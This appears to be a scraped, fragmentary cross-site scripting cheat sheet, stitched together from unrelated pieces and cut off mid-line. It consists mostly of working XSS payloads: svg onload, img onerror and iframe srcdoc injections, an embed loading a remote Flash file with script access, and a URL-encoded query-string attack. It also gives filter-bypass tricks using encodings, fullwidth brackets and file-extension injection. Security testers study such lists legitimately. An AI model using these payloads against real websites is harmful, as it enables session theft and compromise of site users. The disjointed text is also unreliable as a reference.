var/onmouseover="prompt(1)">On Mouse Over</var> "><img src=k.png onerror=alert(/1/.source) /> “><svg/onload=confirm(1)// "><h1>xss</h1>! <
<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
Name: '"><svg/onload=confirm(/OPENBUGBOUNTY/)>.
<svg onload=alert(1)//. Bypass inequality symbols. Unicode Character U+FF1C and U+FF1E.
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1.
Use <svg onload=alert(1)> payload as file extension. When extension reflects in html. Sometime developers validate filename and forgot to validate extension.
...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
here is a query link: site.com?q=%27>"<svg/onload=confirm(%27testing-xss1%27)>&s=%27>"<svg/onload=confirm